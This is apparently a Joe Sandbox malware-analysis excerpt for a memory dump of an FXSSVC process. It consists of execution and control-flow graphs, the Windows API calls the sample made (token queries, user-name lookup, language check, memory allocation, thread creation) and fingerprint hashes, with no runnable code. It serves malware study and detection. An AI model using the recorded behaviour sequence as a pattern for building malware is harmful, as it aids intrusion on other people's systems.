                                                                                                                                                                                                                                      execution_graph 5782 c95b09 5783 c95b16 5782->5783 5784 c95d0d 5783->5784 5785 c95cdf CreateThread 5783->5785 5786 c95c01 5785->5786 5787 c954a0 5785->5787 5738 c955ef 5741 c955ac 5738->5741 5740 c955e9 5741->5740 5742 cb3870 5741->5742 5743 cb3876 5742->5743 5745 cb3893 5743->5745 5746 cb3720 5743->5746 5745->5741 5748 ca0c42 5746->5748 5747 c9e050 VirtualAlloc 5747->5748 5748->5746 5748->5747 5749 cb37dd 5748->5749 5749->5745 5749->5749 5683 c95b00 5684 c95bba 5683->5684 5691 ca52c0 5684->5691 5686 c95bc7 5690 c95bde 5686->5690 5696 cb0080 5686->5696 5692 ca52c6 5691->5692 5695 ca52ce 5691->5695 5692->5695 5708 c9e050 5692->5708 5695->5686 5697 cb0089 5696->5697 5698 cb0181 VirtualFree 5697->5698 5699 c9e050 VirtualAlloc 5697->5699 5700 cb03bf GetUserNameW 5697->5700 5701 c95c7b 5697->5701 5698->5697 5699->5697 5700->5697 5702 c98070 5701->5702 5704 c98075 5702->5704 5703 c98186 CloseHandle 5703->5704 5704->5703 5705 c981ad GetTokenInformation 5704->5705 5706 c980ca GetTokenInformation 5704->5706 5707 c980a7 5704->5707 5705->5704 5706->5704 5707->5690 5709 c9e0c3 5708->5709 5710 c9e0d8 VirtualAlloc 5709->5710 5710->5709 5731 c95860 5732 ca52c0 VirtualAlloc 5731->5732 5733 c95869 5732->5733 5734 cb0080 3 API calls 5733->5734 5735 c9587d 5734->5735 5736 c98070 3 API calls 5735->5736 5737 c95870 5736->5737 5711 c95b42 5712 c95b07 5711->5712 5712->5711 5713 c95cdf CreateThread 5712->5713 5714 c95b68 5712->5714 5713->5714 5715 c954a0 5713->5715 5716 c954b5 5715->5716 5750 c955e4 5752 c955ac 5750->5752 5751 cb3870 VirtualAlloc 5751->5752 5752->5750 5752->5751 5753 c955e9 5752->5753 5717 c95b87 CreateThread 5718 c95b1c 5717->5718 5723 c95810 5717->5723 5719 c95d0d 5718->5719 5720 c95cdf CreateThread 5718->5720 5721 c95c01 5720->5721 5722 c954a0 5720->5722 5724 c95822 5723->5724 5677 c981b1 5682 c98075 5677->5682 5678 c98186 CloseHandle 5678->5682 5679 c980a7 5680 c981ad GetTokenInformation 5680->5682 5681 c980ca GetTokenInformation 5681->5682 5682->5678 5682->5679 5682->5680 5682->5681 5725 c98090 5728 c98075 5725->5728 5726 c98186 CloseHandle 5726->5728 5727 c980a7 5728->5726 5728->5727 5729 c980ca GetTokenInformation 5728->5729 5730 c981ad GetTokenInformation 5728->5730 5729->5728 5730->5728 5754 c957f0 5757 c955ac 5754->5757 5755 cb3870 VirtualAlloc 5755->5757 5756 c955e9 5757->5755 5757->5756

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 292 c952a0-c952a5 293 c952ab-c952f5 292->293 294 c9532e-c9533f 292->294 293->294 297 c952f7 293->297 298 c9536b-c95390 294->298 299 c953fe 297->299 305 c953c3 298->305 306 c95392-c9539a 298->306 301 cd0d4c-cd0d4e 299->301 302 c95404-c9540e 299->302 304 c95424 302->304 307 c9539b 304->307 308 c9542a 304->308 306->307 309 c9539d-c953a1 307->309 310 c95413-c95419 307->310 308->307 311 c95430-c95443 308->311 312 c952b0-c952b5 309->312 313 c953a7 309->313 313->312 314 c953ad 313->314 315 c953af-c953f1 314->315 316 c953f3-c953f9 314->316 315->310 315->316 316->299 319 c95322-c95328 316->319 320 c9532a 319->320 321 c95355 319->321 320->321 322 c9532c 320->322 324 c952e8-c95363 321->324 325 c952d1-c952e7 321->325 322->294 328 c953d1-c953d5 324->328 329 c95365 324->329 325->324 328->309 330 c953d7 328->330 329->328 331 c95367-c95369 329->331 333 c9534b 330->333 334 c95400-c9540e 330->334 331->298 333->334 335 c95351-c95353 333->335 334->304 335->321
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 00C953C4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                                                                                      • Instruction ID: 28edc0cabe38e86fcc4af0a9187b1f66c8c522dc0a11e6d89bd923b93cb7ec4d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D41076190DE958FDF274326446C3707BA0BB223E2F9D04D7D4A68B0F2D1984E819726

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 0 c98070-c9817e 2 c9813d-c981a5 0->2 3 c98180 0->3 16 c981bd-c981ca 2->16 17 c981a7 2->17 4 c9815f 3->4 5 c98184 3->5 4->2 9 c98161 4->9 6 c9818c-c98192 5->6 7 c98186 CloseHandle 5->7 10 c98115-c98118 6->10 11 c98194 6->11 7->6 13 c98163-c98170 call cc7164 9->13 14 c98119-c9811a 10->14 15 c980a7 10->15 11->10 18 c9819a 11->18 13->7 23 c98172 13->23 14->15 21 c9811c 14->21 28 c981d0 16->28 29 c980f3 16->29 22 c9813c 18->22 24 c9820f 21->24 22->5 23->6 26 c9808e-c98096 24->26 27 c98215-c9821e 24->27 26->5 26->15 27->26 39 c98224 27->39 36 c981fe-c98201 GetTokenInformation 28->36 37 c980c3 28->37 30 c9808c 29->30 31 c980f5 29->31 30->26 31->30 38 c98077 31->38 36->24 51 c981b7 36->51 37->36 41 c980c9 37->41 42 c981d7-c981de call cc715c 38->42 39->42 43 c98226 39->43 46 c980ca-c980d8 GetTokenInformation 41->46 49 c981e3-c981e6 42->49 43->42 47 c98228-c982ee call c95d90 43->47 50 c9810f 46->50 66 c9830c-c9831e 47->66 67 c982f0 47->67 49->46 65 c98089 49->65 52 c9812d 50->52 53 c98111 50->53 51->24 56 c981b9-c981bb 51->56 59 c980a8 52->59 60 c98133 52->60 53->52 57 c98113 53->57 56->16 57->10 63 c980aa-c980ad 59->63 60->22 64 c981ed-c981f0 60->64 63->13 68 c980b3-c98203 63->68 69 c980da-c980f1 64->69 70 c981f6 64->70 65->46 71 c9808b 65->71 75 c982a1-c982ba call c95d90 call c9ec00 66->75 76 c98320 66->76 67->66 72 c982f2 67->72 68->13 79 c98209 68->79 69->63 70->69 74 c981fc 70->74 71->30 77 c982f7-c982fc call c95d90 72->77 74->36 75->76 76->77 81 c98322 76->81 89 c98253-c98265 call cb1280 77->89 90 c98302 77->90 81->77 84 c98324-c98326 81->84 88 c98328 84->88 95 c982df-c9832b 88->95 96 c98335 88->96 89->88 103 c9826b 89->103 90->89 94 c98308-c9830a 90->94 94->66 95->96 100 c9832d-c98331 95->100 97 c9826e-c98285 96->97 101 c9829b-c9829d 97->101 102 c98287 97->102 100->96 101->75 104 c9824c 102->104 103->97 105 c98239 103->105 104->101 106 c9824e-c98252 104->106 105->88 107 c9823f-c98243 105->107 106->97 107->77 107->104
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                                                                                      • Instruction ID: 1119f00bc1876f84fa5489a59afb6a9c73671ac09e34dfda3e9f885ff6fe260e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7461443150CE85DFCF658B29881C7397BA0FB57350F68125AE46BC31A0DF288E4D9752

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 108 cb0080-cb0286 110 cb0099-cb0575 108->110 111 cb028c 108->111 115 cb057b 110->115 116 cb0155 110->116 113 cb0445 111->113 113->110 114 cb044b-cb0457 113->114 117 cb0458-cb0472 114->117 115->116 118 cb0581-cb0587 115->118 119 cb02ef-cb0495 call c9e050 * 2 116->119 132 cb03ee-cb03f4 117->132 133 cb024c-cb0253 117->133 122 cb058b 118->122 119->117 150 cb043e 119->150 124 cb058c-cb0591 122->124 125 cb0181 VirtualFree 122->125 128 cb04ab-cb04af 124->128 129 cb0597 124->129 126 cb01a8-cb02ac call cc7164 125->126 144 cb02b1-cb02be 126->144 147 cb04c7 128->147 129->128 134 cb059d 129->134 153 cb00da-cb023f 132->153 154 cb03fa 132->154 136 cb01e6 133->136 137 cb0255 133->137 134->128 143 cb01ec-cb0313 call cc715c 136->143 136->144 146 cb02d3 137->146 162 cb0318-cb031e 143->162 148 cb03bf-cb03d9 GetUserNameW 144->148 149 cb02c4 144->149 146->136 152 cb02d9 146->152 160 cb04cc-cb04e6 call cc9970 147->160 155 cb0331 148->155 149->148 156 cb02ca 149->156 150->113 152->119 153->133 161 cb0241-cb024a 153->161 154->153 159 cb0400 154->159 164 cb0171 155->164 165 cb0337 155->165 156->146 163 cbb1ee-cbb49f 159->163 179 cb04ec-cb0514 160->179 180 cb0131 160->180 161->133 161->144 167 cb0568-cb056b 162->167 168 cb0324 162->168 169 cb013f-cb0146 164->169 170 cb0173 164->170 165->164 171 cb033d 165->171 167->160 168->167 175 cb032a 168->175 169->122 176 cb0230 170->176 173 cb05d0-cb05d9 171->173 173->163 175->155 176->147 178 cb0236-cb05c2 176->178 178->147 184 cb05c8-cb05c9 178->184 179->167 182 cb0089-cb008c 180->182 183 cb0137 180->183 182->126 186 cb0092 182->186 183->182 187 cb013d 183->187 184->173 186->126 188 cb0098 186->188 187->125 187->169 188->110
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                                                                                      • Instruction ID: 2873ded4d7082a2d7e317973e0fb3bc8263b27f62594cc705b2f78a8c14af6cb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AD10531418F098FC728EF59D84A7EBB7E1FBA0310F28461FD856C3164DA74DA498AC2

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 189 c95910-c95912 190 c95950-c95968 189->190 191 c95915-c95928 call cc9970 189->191 190->191 193 c9596a 190->193 198 c959b8 call cb0df0 191->198 195 c9592f 193->195 196 c95970-c9597b 193->196 195->191 197 c95931-ca072c 195->197 199 c9597d 196->199 200 c959d4 196->200 209 ca0732-ca0738 197->209 210 ca0806-ca0809 197->210 207 c959bd-c959c2 call c95d90 198->207 199->200 205 c9597f-c95981 199->205 202 c959d8 200->202 203 c9593b-c95a15 call cb11a0 200->203 211 c959d9-c959de call cc2190 202->211 208 c95983-c95a38 205->208 224 c959c7-c959ce 207->224 221 c95a3e 208->221 222 c95994-c9599c 208->222 216 ca073e 209->216 217 ca0800 209->217 223 ca079d-ca07a6 210->223 211->222 241 c959e0 211->241 216->217 225 ca0744-ca0774 216->225 217->210 220 ca06b3-ca06b7 217->220 220->223 229 ca06bd 220->229 233 c95a2c-c95a34 221->233 227 c9599e-c959f7 222->227 228 c95a02 222->228 231 ca07a8 223->231 232 ca0791-ca0793 223->232 234 c95a1a-c95a26 224->234 235 c959d0 224->235 236 ca077a-ca081c 225->236 237 ca06d5-ca06d9 225->237 227->228 228->196 229->223 239 ca06c3-ca07fe 229->239 231->232 242 ca07aa 231->242 240 ca07ca-ca07cc 232->240 233->211 234->233 243 c959a1-c959b5 call c95e10 234->243 235->234 244 c959d2-c959de 235->244 236->223 249 ca06db 237->249 250 ca06df 237->250 239->217 241->222 246 c959e2-c959ec 241->246 242->240 243->198 258 c95a08-c95a0b 243->258 244->222 244->241 252 c959ee-c959ef 246->252 253 c95a62-c95a6e 246->253 249->250 255 ca06dd 249->255 250->223 252->208 257 c959f1 252->257 260 c95a70 253->260 261 c95a75-c95ab3 call cb1280 253->261 255->250 259 cac0cc 255->259 257->191 258->222 264 c95a0d 258->264 265 cac0e8-cac102 259->265 266 cac0ce-cac0d0 259->266 260->261 262 c95a72 260->262 279 c95abb-c95ac9 261->279 280 c95ab5 261->280 262->261 272 c95991 264->272 273 c95932 264->273 267 cac0d2-cac0df 265->267 268 cac104 265->268 266->267 275 cac0e7 267->275 268->267 268->275 272->273 277 c95993 272->277 277->222 281 c95af2-c95af5 279->281 280->279 282 c95ab7-c95ab9 280->282 286 c95adb-c95adc 281->286 287 c95ad5 281->287 282->279 289 c95ae2 286->289 290 c95a45-c95a46 286->290 287->286 288 c95ad7-c95ad9 287->288 288->286 289->290 291 c95ae8 289->291 291->281
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                                                                                      • Instruction ID: e16622fd18d44b3fe24e4563c8dc200d8a44406015107cc19ce5cd7648193664
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EF1492171CE488FCB6A972D58553FA73D2FB9A320F68019EE45AC3296DD349D06D382

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 336 c95b42-c95b47 call c95d90 338 c95b4c-c95b52 336->338 340 c95b0d 338->340 341 c95c42-c95c62 call cb1280 338->341 340->341 342 c95b13 340->342 359 c95c14-c95cc0 341->359 360 c95c26 341->360 344 c95c8f-c95c96 342->344 346 c95c29 344->346 347 c95c98-c95c9a 344->347 348 c95c2f-c95c36 346->348 349 c95cc2-c95cc9 call c952a0 346->349 351 c95c9c 347->351 348->349 352 c95c3c 348->352 361 c95c69 349->361 362 c95ccb 349->362 357 c95bfa 351->357 358 c95d0e-c95d18 351->358 352->336 357->358 363 c95c00 357->363 364 c95d1a 358->364 365 c95d54 358->365 359->349 360->359 367 c95c28 360->367 369 c95b68-c95d75 361->369 370 c95c6f 361->370 362->351 368 c95ccd 362->368 363->359 371 c95d4b-c95d52 364->371 367->346 368->351 372 c95ccf-c95ce4 CreateThread 368->372 370->369 374 c95c75 370->374 371->365 375 c95d45-c95d47 371->375 379 c95cea 372->379 380 c95c01-c95c05 372->380 374->344 377 c95d49 375->377 378 c95d5f 375->378 377->371 377->378 383 c95d65 378->383 379->380 382 c95cf0-c95cf6 379->382 384 c95c20-c95c68 380->384 387 c95d37-c95d41 380->387 382->384 383->383 387->371 388 c95d43 387->388 388->365
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                                                                                      • Instruction ID: 10b397f30d8de2f7aced5a4ce4e6e7c4a9b2f7694c60f9cac118be26c2ce7544
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3521BD3120CF45CFCF6B9B29849C77466E1EB5D310F6805A6C467CF2E6CA24CE44A356

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 389 c95b09-c95d01 394 c95bb4-c95ce4 CreateThread 389->394 395 c95d07 389->395 399 c95cea 394->399 400 c95c01-c95c05 394->400 395->394 397 c95d0d 395->397 399->400 402 c95cf0-c95cf6 399->402 403 c95c20-c95c68 400->403 406 c95d37-c95d41 400->406 402->403 407 c95d4b-c95d52 406->407 408 c95d43 406->408 409 c95d54 407->409 410 c95d45-c95d47 407->410 408->409 411 c95d49 410->411 412 c95d5f 410->412 411->407 411->412 413 c95d65 412->413 413->413
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                                                                                      • Instruction ID: b7eb871c83c9fdeba0f64871be3d0c6341a6ceadcddd5a8c1d7fe87fd25b0cd2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B01F13250DF86CFDF675B358D1C3797B90AB19324F2401ABC497CA0D9EAA08B01E712

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 414 c95b87-c95d01 CreateThread 418 c95bb4-c95ce4 CreateThread 414->418 419 c95d07 414->419 423 c95cea 418->423 424 c95c01-c95c05 418->424 419->418 421 c95d0d 419->421 423->424 426 c95cf0-c95cf6 423->426 427 c95c20-c95c68 424->427 430 c95d37-c95d41 424->430 426->427 431 c95d4b-c95d52 430->431 432 c95d43 430->432 433 c95d54 431->433 434 c95d45-c95d47 431->434 432->433 435 c95d49 434->435 436 c95d5f 434->436 435->431 435->436 437 c95d65 436->437 437->437
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                                                                                      • Instruction ID: 629765d23cf6ef63ee6a8897d0b063ac86da47f80051ddc7d9592bd8af69b29e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52E0863061DB448FDF6B9B2498147193AE5EB88314F1501CEC44AD71D1CB690A058792

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 438 c9599b-c9599e 439 c959b8 call cb0df0 438->439 440 c959f7 438->440 444 c959bd-c959c2 call c95d90 439->444 441 c95a02 440->441 445 c9597d 441->445 446 c959d4 441->446 451 c959c7-c959ce 444->451 445->446 450 c9597f-c95981 445->450 448 c959d8 446->448 449 c9593b-c95a15 call cb11a0 446->449 456 c959d9-c959de call cc2190 448->456 453 c95983-c95a38 450->453 454 c95a1a-c95a26 451->454 455 c959d0 451->455 465 c95a3e 453->465 466 c95994-c9599c 453->466 458 c95a2c-c95a34 454->458 459 c959a1-c959b5 call c95e10 454->459 455->454 461 c959d2-c959de 455->461 456->466 471 c959e0 456->471 458->456 459->439 472 c95a08-c95a0b 459->472 461->466 461->471 465->458 466->441 468 c9599e 466->468 468->440 471->466 473 c959e2-c959ec 471->473 472->466 474 c95a0d 472->474 475 c959ee-c959ef 473->475 476 c95a62-c95a6e 473->476 481 c95991 474->481 482 c95932 474->482 475->453 478 c959f1 call cc9970 475->478 479 c95a70 476->479 480 c95a75-c95ab3 call cb1280 476->480 478->439 479->480 483 c95a72 479->483 492 c95abb-c95ac9 480->492 493 c95ab5 480->493 481->482 486 c95993 481->486 483->480 486->466 494 c95af2-c95af5 492->494 493->492 495 c95ab7-c95ab9 493->495 499 c95adb-c95adc 494->499 500 c95ad5 494->500 495->492 502 c95ae2 499->502 503 c95a45-c95a46 499->503 500->499 501 c95ad7-c95ad9 500->501 501->499 502->503 504 c95ae8 502->504 504->494
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                                                                                      • Instruction ID: 12fe6d4a772f131293c5acb8f98f6286be5b5a773435e130bf3e5d9db48c2655
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E01F97191DE80CFFF17A719405D3796651F754334F2A059AA05ACB092CC344F02B345

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 505 c98090-c98096 506 c98184 505->506 507 c9818c-c98192 506->507 508 c98186 CloseHandle 506->508 509 c98115-c98118 507->509 510 c98194 507->510 508->507 511 c98119-c9811a 509->511 512 c980a7 509->512 510->509 513 c9819a 510->513 511->512 514 c9811c 511->514 515 c9813c 513->515 516 c9820f 514->516 515->506 517 c9808e-c98096 516->517 518 c98215-c9821e 516->518 517->506 517->512 518->517 520 c98224 518->520 521 c981d7-c981e6 call cc715c 520->521 522 c98226 520->522 532 c98089 521->532 533 c980ca-c9810f GetTokenInformation 521->533 522->521 524 c98228-c982ee call c95d90 522->524 534 c9830c-c9831e 524->534 535 c982f0 524->535 532->533 537 c9808b 532->537 538 c9812d 533->538 539 c98111 533->539 541 c982a1-c982ba call c95d90 call c9ec00 534->541 542 c98320 534->542 535->534 540 c982f2 535->540 549 c9808c 537->549 546 c980a8 538->546 547 c98133 538->547 539->538 543 c98113 539->543 544 c982f7-c982fc call c95d90 540->544 541->542 542->544 548 c98322 542->548 543->509 564 c98253-c98265 call cb1280 544->564 565 c98302 544->565 550 c980aa-c980ad 546->550 547->515 553 c981ed-c981f0 547->553 548->544 554 c98324-c98326 548->554 549->517 555 c98163-c98170 call cc7164 550->555 556 c980b3-c98203 550->556 557 c980da-c980f1 553->557 558 c981f6 553->558 561 c98328 554->561 555->508 577 c98172 555->577 556->555 573 c98209 556->573 557->550 558->557 563 c981fc 558->563 575 c982df-c9832b 561->575 576 c98335 561->576 571 c981fe-c98201 GetTokenInformation 563->571 564->561 585 c9826b 564->585 565->564 572 c98308-c9830a 565->572 571->516 590 c981b7 571->590 572->534 575->576 582 c9832d-c98331 575->582 578 c9826e-c98285 576->578 577->507 583 c9829b-c9829d 578->583 584 c98287 578->584 582->576 583->541 588 c9824c 584->588 585->578 589 c98239 585->589 588->583 591 c9824e-c98252 588->591 589->561 592 c9823f-c98243 589->592 590->516 593 c981b9-c981ca 590->593 591->578 592->544 592->588 596 c981d0 593->596 597 c980f3 593->597 596->571 602 c980c3 596->602 597->549 598 c980f5 597->598 598->549 603 c98077 598->603 602->571 604 c980c9 602->604 603->521 604->533
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                                                                                      • Instruction ID: 70d9cba8eaa4ea97652595a70e19e9f6491df349822974d8cda22baa8f66f4ff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54C04C6152DD46965E79064A1C1F0FC26549713751B5C04869C2683220DE558F4B519B

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
